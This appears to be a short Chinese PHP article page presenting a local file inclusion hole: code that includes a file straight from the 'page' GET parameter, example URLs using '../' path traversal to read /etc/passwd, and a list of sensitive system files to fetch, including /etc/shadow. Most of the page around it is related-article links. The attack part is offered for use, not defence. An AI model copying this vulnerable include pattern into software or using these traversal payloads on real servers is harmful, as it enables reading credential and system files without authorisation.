编程 PHP

php 伪造本地文件包含漏洞的代码

Posted in PHP onNovember 03, 2011

代码:

<?php 
$page=$_GET['page']; 
include($page.'php'); 
?>

你可以这样使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd

获取更多数据:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

来自hackteach

php 伪造本地文件包含漏洞的代码

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

PHP 相关文章推荐

基于mysql的论坛（7）

Oct 09 PHP

刚才在简化php的库，结果发现很多东西

Dec 31 PHP

PHP 定界符使用技巧

Jun 14 PHP

PHP常用代码大全(新手入门必备)

Jun 29 PHP

php的urlencode()URL编码函数浅析

Aug 09 PHP

PHP框架Swoole定时器Timer特性分析

Aug 19 PHP

PHP防盗链代码实例

Aug 27 PHP

PHP fastcgi模式上传大文件(大约有300多K)报错

Sep 28 PHP

Thinkphp批量更新数据的方法汇总

Jun 29 PHP

利用php_imagick实现复古效果的方法

Oct 18 PHP

php菜单/评论数据递归分级算法的实现方法

Aug 01 PHP

ThinkPHP5和ThinkPHP6的区别

Mar 31 PHP

有关php运算符的知识大全

Nov 03 #PHP

PHP读取txt文件的内容并赋值给数组的代码

Nov 03 #PHP

PHP支持多种格式图片上传(支持jpg、png、gif)

Nov 03 #PHP

PHP安全防范技巧分享

Nov 03 #PHP

防止本地用户用fsockopen DDOS攻击对策

Nov 02 #PHP

PHP隐形一句话后门，和ThinkPHP框架加密码程序(base64_decode)

Nov 02 #PHP

php数组函数序列之krsort()- 对数组的元素键名进行降序排序,保持索引关系

Nov 02 #PHP

相对路径 (1) openpyxl(1) 相对路径(1) hashlib(1) requests(1) 解密(1) hmac(1) mt-swipe(1) Mint UI(1) 面向对象(3)

You might like

ThinkPHP框架使用redirect实现页面重定向的方法实例分析

2018/04/12 PHP

用js实现下载远程文件并保存在本地的脚本

2008/05/06 Javascript

JS使用cookie实现DIV提示框只显示一次的方法

2015/11/05 Javascript

简单学习JavaScript中的for语句循环结构

2015/11/10 Javascript

所见即所得的富文本编辑器bootstrap-wysiwyg使用方法详解

2016/05/27 Javascript

vue.js表格分页示例

2016/10/18 Javascript

微信小程序生命周期详解

2016/10/27 Javascript

vue 右键菜单插件简单、可扩展、样式自定义的右键菜单

2018/11/29 Javascript

关于自定义Egg.js的请求级别日志详解

2018/12/12 Javascript

通过Kettle自定义jar包供javascript使用

2020/01/29 Javascript

JavaScript组合设计模式--改进引入案例分析

2020/05/23 Javascript

JS实现悬浮球只在一侧滑动并且是横屏状态下

2020/08/19 Javascript

vue-quill-editor插入图片路径太长问题解决方法

2021/01/08 Vue.js

[03:40]DOTA2亚洲邀请赛小组赛第二日赛事回顾

2015/01/31 DOTA

简单介绍Python中用于求最小值的min()方法

2015/05/15 Python

python实现教务管理系统

2018/03/12 Python

利用python将json数据转换为csv格式的方法

2018/03/22 Python

Python中将dataframe转换为字典的实例

2018/04/13 Python

python通过微信发送邮件实现电脑关机

2018/06/20 Python

python计算两个数的百分比方法

2018/06/29 Python

Python自定义装饰器原理与用法实例分析

2018/07/16 Python

python数据处理——对pandas进行数据变频或插值实例

2020/04/22 Python

python3.6中anaconda安装sklearn踩坑实录

2020/07/28 Python

python之pygame模块实现飞机大战完整代码

2020/11/29 Python

详解css3 flex弹性盒自动铺满写法

2020/09/17 HTML / CSS

美国著名首饰网站：BaubleBar

2016/08/29 全球购物

英国家电直销：Appliances Direct

2016/09/22 全球购物

北美大型运动类产品商城：Champs Sports

2017/01/12 全球购物

娇韵诗法国官网：Clarins法国

2019/01/29 全球购物

车间操作工岗位职责

2013/12/19 职场文书

婚庆公司的创业计划书

2014/01/22 职场文书

2014年党课学习心得体会

2014/07/08 职场文书

小学生教师节演讲稿

2014/09/03 职场文书

党支部综合考察意见

2015/06/01 职场文书

python爬虫之爬取笔趣阁小说

2021/04/22 Python

Python列表删除重复元素与图像相似度判断及删除实例代码

2021/05/07 Python